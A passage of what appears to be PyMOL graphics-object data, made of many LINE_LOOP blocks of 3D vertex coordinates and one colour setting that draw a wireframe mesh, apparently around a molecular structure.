VERTEX, 16.570, 37.511, 26.338,
VERTEX, 16.636, 37.816, 26.649,
VERTEX, 16.391, 37.644, 26.391,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.636, 37.816, 26.649,
VERTEX, 16.391, 37.644, 26.391,
VERTEX, 16.422, 37.890, 26.690,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.391, 37.644, 26.391,
VERTEX, 16.422, 37.890, 26.690,
VERTEX, 16.240, 37.652, 26.564,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.422, 37.890, 26.690,
VERTEX, 16.240, 37.652, 26.564,
VERTEX, 16.275, 37.871, 26.865,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.240, 37.652, 26.564,
VERTEX, 16.275, 37.871, 26.865,
VERTEX, 16.206, 37.530, 26.756,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.275, 37.871, 26.865,
VERTEX, 16.206, 37.530, 26.756,
VERTEX, 16.280, 37.771, 27.071,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.206, 37.530, 26.756,
VERTEX, 16.280, 37.771, 27.071,
VERTEX, 16.308, 37.349, 26.854,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.280, 37.771, 27.071,
VERTEX, 16.308, 37.349, 26.854,
VERTEX, 16.435, 37.648, 27.188,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.308, 37.349, 26.854,
VERTEX, 16.435, 37.648, 27.188,
VERTEX, 16.487, 37.216, 26.801,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.435, 37.648, 27.188,
VERTEX, 16.487, 37.216, 26.801,
VERTEX, 16.649, 37.575, 27.147,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.487, 37.216, 26.801,
VERTEX, 16.649, 37.575, 27.147,
VERTEX, 16.638, 37.208, 26.628,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.649, 37.575, 27.147,
VERTEX, 16.638, 37.208, 26.628,
VERTEX, 16.796, 37.593, 26.972,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.638, 37.208, 26.628,
VERTEX, 16.796, 37.593, 26.972,
VERTEX, 16.672, 37.330, 26.436,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.796, 37.593, 26.972,
VERTEX, 16.672, 37.330, 26.436,
VERTEX, 16.791, 37.694, 26.766,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.672, 37.330, 26.436,
VERTEX, 16.791, 37.694, 26.766,
VERTEX, 16.570, 37.511, 26.338,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.791, 37.694, 26.766,
VERTEX, 16.570, 37.511, 26.338,
VERTEX, 16.636, 37.816, 26.649,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.636, 37.816, 26.649,
VERTEX, 16.621, 38.154, 26.874,
VERTEX, 16.422, 37.890, 26.690,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.621, 38.154, 26.874,
VERTEX, 16.422, 37.890, 26.690,
VERTEX, 16.394, 38.163, 26.904,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.422, 37.890, 26.690,
VERTEX, 16.394, 38.163, 26.904,
VERTEX, 16.275, 37.871, 26.865,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.394, 38.163, 26.904,
VERTEX, 16.275, 37.871, 26.865,
VERTEX, 16.251, 38.119, 27.078,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.275, 37.871, 26.865,
VERTEX, 16.251, 38.119, 27.078,
VERTEX, 16.280, 37.771, 27.071,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.251, 38.119, 27.078,
VERTEX, 16.280, 37.771, 27.071,
VERTEX, 16.276, 38.047, 27.295,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.280, 37.771, 27.071,
VERTEX, 16.276, 38.047, 27.295,
VERTEX, 16.435, 37.648, 27.188,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.276, 38.047, 27.295,
VERTEX, 16.435, 37.648, 27.188,
VERTEX, 16.454, 37.990, 27.427,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.435, 37.648, 27.188,
VERTEX, 16.454, 37.990, 27.427,
VERTEX, 16.649, 37.575, 27.147,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.454, 37.990, 27.427,
VERTEX, 16.649, 37.575, 27.147,
VERTEX, 16.682, 37.980, 27.397,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.649, 37.575, 27.147,
VERTEX, 16.682, 37.980, 27.397,
VERTEX, 16.796, 37.593, 26.972,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.682, 37.980, 27.397,
VERTEX, 16.796, 37.593, 26.972,
VERTEX, 16.825, 38.024, 27.223,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.796, 37.593, 26.972,
VERTEX, 16.825, 38.024, 27.223,
VERTEX, 16.791, 37.694, 26.766,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.825, 38.024, 27.223,
VERTEX, 16.791, 37.694, 26.766,
VERTEX, 16.800, 38.096, 27.007,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.791, 37.694, 26.766,
VERTEX, 16.800, 38.096, 27.007,
VERTEX, 16.636, 37.816, 26.649,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.800, 38.096, 27.007,
VERTEX, 16.636, 37.816, 26.649,
VERTEX, 16.621, 38.154, 26.874,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.621, 38.154, 26.874,
VERTEX, 16.550, 38.526, 27.036,
VERTEX, 16.394, 38.163, 26.904,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.550, 38.526, 27.036,
VERTEX, 16.394, 38.163, 26.904,
VERTEX, 16.324, 38.485, 27.055,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.394, 38.163, 26.904,
VERTEX, 16.324, 38.485, 27.055,
VERTEX, 16.251, 38.119, 27.078,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.324, 38.485, 27.055,
VERTEX, 16.251, 38.119, 27.078,
VERTEX, 16.186, 38.418, 27.225,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.251, 38.119, 27.078,
VERTEX, 16.186, 38.418, 27.225,
VERTEX, 16.276, 38.047, 27.295,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.186, 38.418, 27.225,
VERTEX, 16.276, 38.047, 27.295,
VERTEX, 16.214, 38.363, 27.446,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.276, 38.047, 27.295,
VERTEX, 16.214, 38.363, 27.446,
VERTEX, 16.454, 37.990, 27.427,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.214, 38.363, 27.446,
VERTEX, 16.454, 37.990, 27.427,
VERTEX, 16.394, 38.352, 27.589,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.454, 37.990, 27.427,
VERTEX, 16.394, 38.352, 27.589,
VERTEX, 16.682, 37.980, 27.397,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.394, 38.352, 27.589,
VERTEX, 16.682, 37.980, 27.397,
VERTEX, 16.619, 38.393, 27.569,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.682, 37.980, 27.397,
VERTEX, 16.619, 38.393, 27.569,
VERTEX, 16.825, 38.024, 27.223,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.619, 38.393, 27.569,
VERTEX, 16.825, 38.024, 27.223,
VERTEX, 16.758, 38.460, 27.399,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.825, 38.024, 27.223,
VERTEX, 16.758, 38.460, 27.399,
VERTEX, 16.800, 38.096, 27.007,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.758, 38.460, 27.399,
VERTEX, 16.800, 38.096, 27.007,
VERTEX, 16.729, 38.515, 27.178,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.800, 38.096, 27.007,
VERTEX, 16.729, 38.515, 27.178,
VERTEX, 16.621, 38.154, 26.874,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.729, 38.515, 27.178,
VERTEX, 16.621, 38.154, 26.874,
VERTEX, 16.550, 38.526, 27.036,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.550, 38.526, 27.036,
VERTEX, 16.440, 38.925, 27.150,
VERTEX, 16.324, 38.485, 27.055,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.440, 38.925, 27.150,
VERTEX, 16.324, 38.485, 27.055,
VERTEX, 16.223, 38.851, 27.159,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.324, 38.485, 27.055,
VERTEX, 16.223, 38.851, 27.159,
VERTEX, 16.186, 38.418, 27.225,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.223, 38.851, 27.159,
VERTEX, 16.186, 38.418, 27.225,
VERTEX, 16.088, 38.762, 27.322,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.186, 38.418, 27.225,
VERTEX, 16.088, 38.762, 27.322,
VERTEX, 16.214, 38.363, 27.446,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.088, 38.762, 27.322,
VERTEX, 16.214, 38.363, 27.446,
VERTEX, 16.116, 38.709, 27.544,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.214, 38.363, 27.446,
VERTEX, 16.116, 38.709, 27.544,
VERTEX, 16.394, 38.352, 27.589,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.116, 38.709, 27.544,
VERTEX, 16.394, 38.352, 27.589,
VERTEX, 16.289, 38.724, 27.694,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.394, 38.352, 27.589,
VERTEX, 16.289, 38.724, 27.694,
VERTEX, 16.619, 38.393, 27.569,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.289, 38.724, 27.694,
VERTEX, 16.619, 38.393, 27.569,
VERTEX, 16.506, 38.797, 27.685,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.619, 38.393, 27.569,
VERTEX, 16.506, 38.797, 27.685,
VERTEX, 16.758, 38.460, 27.399,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.506, 38.797, 27.685,
VERTEX, 16.758, 38.460, 27.399,
VERTEX, 16.640, 38.887, 27.522,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.758, 38.460, 27.399,
VERTEX, 16.640, 38.887, 27.522,
VERTEX, 16.729, 38.515, 27.178,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.640, 38.887, 27.522,
VERTEX, 16.729, 38.515, 27.178,
VERTEX, 16.613, 38.940, 27.300,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.729, 38.515, 27.178,
VERTEX, 16.613, 38.940, 27.300,
VERTEX, 16.550, 38.526, 27.036,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.613, 38.940, 27.300,
VERTEX, 16.550, 38.526, 27.036,
VERTEX, 16.440, 38.925, 27.150,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.440, 38.925, 27.150,
VERTEX, 16.315, 39.340, 27.236,
VERTEX, 16.223, 38.851, 27.159,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.315, 39.340, 27.236,
VERTEX, 16.223, 38.851, 27.159,
VERTEX, 16.105, 39.247, 27.235,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.223, 38.851, 27.159,
VERTEX, 16.105, 39.247, 27.235,
VERTEX, 16.088, 38.762, 27.322,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.105, 39.247, 27.235,
VERTEX, 16.088, 38.762, 27.322,
VERTEX, 15.975, 39.137, 27.389,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.088, 38.762, 27.322,
VERTEX, 15.975, 39.137, 27.389,
VERTEX, 16.116, 38.709, 27.544,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.975, 39.137, 27.389,
VERTEX, 16.116, 38.709, 27.544,
VERTEX, 16.001, 39.074, 27.608,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.116, 38.709, 27.544,
VERTEX, 16.001, 39.074, 27.608,
VERTEX, 16.289, 38.724, 27.694,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.001, 39.074, 27.608,
VERTEX, 16.289, 38.724, 27.694,
VERTEX, 16.169, 39.095, 27.764,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.289, 38.724, 27.694,
VERTEX, 16.169, 39.095, 27.764,
VERTEX, 16.506, 38.797, 27.685,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.169, 39.095, 27.764,
VERTEX, 16.506, 38.797, 27.685,
VERTEX, 16.378, 39.188, 27.765,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.506, 38.797, 27.685,
VERTEX, 16.378, 39.188, 27.765,
VERTEX, 16.640, 38.887, 27.522,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.378, 39.188, 27.765,
VERTEX, 16.640, 38.887, 27.522,
VERTEX, 16.508, 39.298, 27.611,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.640, 38.887, 27.522,
VERTEX, 16.508, 39.298, 27.611,
VERTEX, 16.613, 38.940, 27.300,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.508, 39.298, 27.611,
VERTEX, 16.613, 38.940, 27.300,
VERTEX, 16.482, 39.361, 27.392,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.613, 38.940, 27.300,
VERTEX, 16.482, 39.361, 27.392,
VERTEX, 16.440, 38.925, 27.150,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.482, 39.361, 27.392,
VERTEX, 16.440, 38.925, 27.150,
VERTEX, 16.315, 39.340, 27.236,
END,
COLOR, 0.000, 0.914, 1.000,
BEGIN, LINE_LOOP,
VERTEX, 16.315, 39.340, 27.236,
VERTEX, 16.197, 39.760, 27.315,
VERTEX, 16.105, 39.247, 27.235,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.197, 39.760, 27.315,
VERTEX, 16.105, 39.247, 27.235,
VERTEX, 15.991, 39.660, 27.305,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.105, 39.247, 27.235,
VERTEX, 15.991, 39.660, 27.305,
VERTEX, 15.975, 39.137, 27.389,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.991, 39.660, 27.305,
VERTEX, 15.975, 39.137, 27.389,
VERTEX, 15.866, 39.530, 27.447,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.975, 39.137, 27.389,
VERTEX, 15.866, 39.530, 27.447,
VERTEX, 16.001, 39.074, 27.608,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.866, 39.530, 27.447,
VERTEX, 16.001, 39.074, 27.608,
VERTEX, 15.896, 39.447, 27.659,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.001, 39.074, 27.608,
VERTEX, 15.896, 39.447, 27.659,
VERTEX, 16.169, 39.095, 27.764,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.896, 39.447, 27.659,
VERTEX, 16.169, 39.095, 27.764,
VERTEX, 16.063, 39.459, 27.816,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.169, 39.095, 27.764,
VERTEX, 16.063, 39.459, 27.816,
VERTEX, 16.378, 39.188, 27.765,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.063, 39.459, 27.816,
VERTEX, 16.378, 39.188, 27.765,
VERTEX, 16.269, 39.559, 27.827,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.378, 39.188, 27.765,
VERTEX, 16.269, 39.559, 27.827,
VERTEX, 16.508, 39.298, 27.611,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.269, 39.559, 27.827,
VERTEX, 16.508, 39.298, 27.611,
VERTEX, 16.394, 39.688, 27.684,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.508, 39.298, 27.611,
VERTEX, 16.394, 39.688, 27.684,
VERTEX, 16.482, 39.361, 27.392,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.394, 39.688, 27.684,
VERTEX, 16.482, 39.361, 27.392,
VERTEX, 16.364, 39.772, 27.472,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.482, 39.361, 27.392,
VERTEX, 16.364, 39.772, 27.472,
VERTEX, 16.315, 39.340, 27.236,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.364, 39.772, 27.472,
VERTEX, 16.315, 39.340, 27.236,
VERTEX, 16.197, 39.760, 27.315,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.197, 39.760, 27.315,
VERTEX, 16.112, 40.175, 27.410,
VERTEX, 15.991, 39.660, 27.305,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.112, 40.175, 27.410,
VERTEX, 15.991, 39.660, 27.305,
VERTEX, 15.903, 40.081, 27.397,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.991, 39.660, 27.305,
VERTEX, 15.903, 40.081, 27.397,
VERTEX, 15.866, 39.530, 27.447,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.903, 40.081, 27.397,
VERTEX, 15.866, 39.530, 27.447,
VERTEX, 15.784, 39.933, 27.525,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.866, 39.530, 27.447,
VERTEX, 15.784, 39.933, 27.525,
VERTEX, 15.896, 39.447, 27.659,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.784, 39.933, 27.525,
VERTEX, 15.896, 39.447, 27.659,
VERTEX, 15.824, 39.818, 27.720,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.896, 39.447, 27.659,
VERTEX, 15.824, 39.818, 27.720,
VERTEX, 16.063, 39.459, 27.816,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.824, 39.818, 27.720,
VERTEX, 16.063, 39.459, 27.816,
VERTEX, 16.000, 39.803, 27.867,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.063, 39.459, 27.816,
VERTEX, 16.000, 39.803, 27.867,
VERTEX, 16.269, 39.559, 27.827,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.000, 39.803, 27.867,
VERTEX, 16.269, 39.559, 27.827,
VERTEX, 16.209, 39.897, 27.880,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.269, 39.559, 27.827,
VERTEX, 16.209, 39.897, 27.880,
VERTEX, 16.394, 39.688, 27.684,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.209, 39.897, 27.880,
VERTEX, 16.394, 39.688, 27.684,
VERTEX, 16.328, 40.045, 27.751,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.394, 39.688, 27.684,
VERTEX, 16.328, 40.045, 27.751,
VERTEX, 16.364, 39.772, 27.472,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.328, 40.045, 27.751,
VERTEX, 16.364, 39.772, 27.472,
VERTEX, 16.288, 40.160, 27.557,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.364, 39.772, 27.472,
VERTEX, 16.288, 40.160, 27.557,
VERTEX, 16.197, 39.760, 27.315,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.288, 40.160, 27.557,
VERTEX, 16.197, 39.760, 27.315,
VERTEX, 16.112, 40.175, 27.410,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.112, 40.175, 27.410,
VERTEX, 16.087, 40.577, 27.548,
VERTEX, 15.903, 40.081, 27.397,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.087, 40.577, 27.548,
VERTEX, 15.903, 40.081, 27.397,
VERTEX, 15.870, 40.502, 27.550,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.903, 40.081, 27.397,
VERTEX, 15.870, 40.502, 27.550,
VERTEX, 15.784, 39.933, 27.525,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.870, 40.502, 27.550,
VERTEX, 15.784, 39.933, 27.525,
VERTEX, 15.756, 40.336, 27.661,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.784, 39.933, 27.525,
VERTEX, 15.756, 40.336, 27.661,
VERTEX, 15.824, 39.818, 27.720,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.756, 40.336, 27.661,
VERTEX, 15.824, 39.818, 27.720,
VERTEX, 15.813, 40.178, 27.817,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.824, 39.818, 27.720,
VERTEX, 15.813, 40.178, 27.817,
VERTEX, 16.000, 39.803, 27.867,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.813, 40.178, 27.817,
VERTEX, 16.000, 39.803, 27.867,
VERTEX, 16.006, 40.119, 27.927,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.000, 39.803, 27.867,
VERTEX, 16.006, 40.119, 27.927,
VERTEX, 16.209, 39.897, 27.880,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.006, 40.119, 27.927,
VERTEX, 16.209, 39.897, 27.880,
VERTEX, 16.223, 40.194, 27.925,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.209, 39.897, 27.880,
VERTEX, 16.223, 40.194, 27.925,
VERTEX, 16.328, 40.045, 27.751,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.223, 40.194, 27.925,
VERTEX, 16.328, 40.045, 27.751,
VERTEX, 16.336, 40.359, 27.813,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.328, 40.045, 27.751,
VERTEX, 16.336, 40.359, 27.813,
VERTEX, 16.288, 40.160, 27.557,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.336, 40.359, 27.813,
VERTEX, 16.288, 40.160, 27.557,
VERTEX, 16.280, 40.518, 27.657,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.288, 40.160, 27.557,
VERTEX, 16.280, 40.518, 27.657,
VERTEX, 16.112, 40.175, 27.410,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.280, 40.518, 27.657,
VERTEX, 16.112, 40.175, 27.410,
VERTEX, 16.087, 40.577, 27.548,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.087, 40.577, 27.548,
VERTEX, 16.154, 40.946, 27.756,
VERTEX, 15.870, 40.502, 27.550,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.154, 40.946, 27.756,
VERTEX, 15.870, 40.502, 27.550,
VERTEX, 15.935, 40.892, 27.801,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.870, 40.502, 27.550,
VERTEX, 15.935, 40.892, 27.801,
VERTEX, 15.756, 40.336, 27.661,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.935, 40.892, 27.801,
VERTEX, 15.756, 40.336, 27.661,
VERTEX, 15.829, 40.711, 27.893,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.756, 40.336, 27.661,
VERTEX, 15.829, 40.711, 27.893,
VERTEX, 15.813, 40.178, 27.817,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.829, 40.711, 27.893,
VERTEX, 15.813, 40.178, 27.817,
VERTEX, 15.897, 40.509, 27.979,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.813, 40.178, 27.817,
VERTEX, 15.897, 40.509, 27.979,
VERTEX, 16.006, 40.119, 27.927,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.897, 40.509, 27.979,
VERTEX, 16.006, 40.119, 27.927,
VERTEX, 16.099, 40.405, 28.008,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.006, 40.119, 27.927,
VERTEX, 16.099, 40.405, 28.008,
VERTEX, 16.223, 40.194, 27.925,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.099, 40.405, 28.008,
VERTEX, 16.223, 40.194, 27.925,
VERTEX, 16.318, 40.459, 27.963,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.223, 40.194, 27.925,
VERTEX, 16.318, 40.459, 27.963,
VERTEX, 16.336, 40.359, 27.813,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.318, 40.459, 27.963,
VERTEX, 16.336, 40.359, 27.813,
VERTEX, 16.424, 40.640, 27.871,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.336, 40.359, 27.813,
VERTEX, 16.424, 40.640, 27.871,
VERTEX, 16.280, 40.518, 27.657,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.424, 40.640, 27.871,
VERTEX, 16.280, 40.518, 27.657,
VERTEX, 16.356, 40.842, 27.785,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.280, 40.518, 27.657,
VERTEX, 16.356, 40.842, 27.785,
VERTEX, 16.087, 40.577, 27.548,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.356, 40.842, 27.785,
VERTEX, 16.087, 40.577, 27.548,
VERTEX, 16.154, 40.946, 27.756,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.154, 40.946, 27.756,
VERTEX, 16.348, 41.256, 28.036,
VERTEX, 15.935, 40.892, 27.801,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.348, 41.256, 28.036,
VERTEX, 15.935, 40.892, 27.801,
VERTEX, 16.145, 41.200, 28.128,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.935, 40.892, 27.801,
VERTEX, 16.145, 41.200, 28.128,
VERTEX, 15.829, 40.711, 27.893,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.145, 41.200, 28.128,
VERTEX, 15.829, 40.711, 27.893,
VERTEX, 16.047, 41.005, 28.199,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.829, 40.711, 27.893,
VERTEX, 16.047, 41.005, 28.199,
VERTEX, 15.897, 40.509, 27.979,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.047, 41.005, 28.199,
VERTEX, 15.897, 40.509, 27.979,
VERTEX, 16.111, 40.785, 28.207,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.897, 40.509, 27.979,
VERTEX, 16.111, 40.785, 28.207,
VERTEX, 16.099, 40.405, 28.008,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.111, 40.785, 28.207,
VERTEX, 16.099, 40.405, 28.008,
VERTEX, 16.300, 40.668, 28.148,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.099, 40.405, 28.008,
VERTEX, 16.300, 40.668, 28.148,
VERTEX, 16.318, 40.459, 27.963,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.300, 40.668, 28.148,
VERTEX, 16.318, 40.459, 27.963,
VERTEX, 16.503, 40.724, 28.056,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.318, 40.459, 27.963,
VERTEX, 16.503, 40.724, 28.056,
VERTEX, 16.424, 40.640, 27.871,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.503, 40.724, 28.056,
VERTEX, 16.424, 40.640, 27.871,
VERTEX, 16.601, 40.919, 27.985,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.424, 40.640, 27.871,
VERTEX, 16.601, 40.919, 27.985,
VERTEX, 16.356, 40.842, 27.785,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.601, 40.919, 27.985,
VERTEX, 16.356, 40.842, 27.785,
VERTEX, 16.537, 41.139, 27.977,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.356, 40.842, 27.785,
VERTEX, 16.537, 41.139, 27.977,
VERTEX, 16.154, 40.946, 27.756,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.537, 41.139, 27.977,
VERTEX, 16.154, 40.946, 27.756,
VERTEX, 16.348, 41.256, 28.036,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.348, 41.256, 28.036,
VERTEX, 16.609, 41.479, 28.332,
VERTEX, 16.145, 41.200, 28.128,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.609, 41.479, 28.332,
VERTEX, 16.145, 41.200, 28.128,
VERTEX, 16.425, 41.407, 28.447,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.145, 41.200, 28.128,
VERTEX, 16.425, 41.407, 28.447,
VERTEX, 16.047, 41.005, 28.199,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.425, 41.407, 28.447,
VERTEX, 16.047, 41.005, 28.199,
VERTEX, 16.335, 41.202, 28.498,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.047, 41.005, 28.199,
VERTEX, 16.335, 41.202, 28.498,
VERTEX, 16.111, 40.785, 28.207,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.335, 41.202, 28.498,
VERTEX, 16.111, 40.785, 28.207,
VERTEX, 16.392, 40.984, 28.454,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.111, 40.785, 28.207,
VERTEX, 16.392, 40.984, 28.454,
VERTEX, 16.300, 40.668, 28.148,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.392, 40.984, 28.454,
VERTEX, 16.300, 40.668, 28.148,
VERTEX, 16.564, 40.881, 28.341,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.300, 40.668, 28.148,
VERTEX, 16.564, 40.881, 28.341,
VERTEX, 16.503, 40.724, 28.056,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.564, 40.881, 28.341,
VERTEX, 16.503, 40.724, 28.056,
VERTEX, 16.749, 40.954, 28.226,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.503, 40.724, 28.056,
VERTEX, 16.749, 40.954, 28.226,
VERTEX, 16.601, 40.919, 27.985,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.749, 40.954, 28.226,
VERTEX, 16.601, 40.919, 27.985,
VERTEX, 16.839, 41.159, 28.176,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.601, 40.919, 27.985,
VERTEX, 16.839, 41.159, 28.176,
VERTEX, 16.537, 41.139, 27.977,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.839, 41.159, 28.176,
VERTEX, 16.537, 41.139, 27.977,
VERTEX, 16.781, 41.377, 28.220,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.537, 41.139, 27.977,
VERTEX, 16.781, 41.377, 28.220,
VERTEX, 16.348, 41.256, 28.036,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.781, 41.377, 28.220,
VERTEX, 16.348, 41.256, 28.036,
VERTEX, 16.609, 41.479, 28.332,
END,
BEGIN, LINE_LOOP,
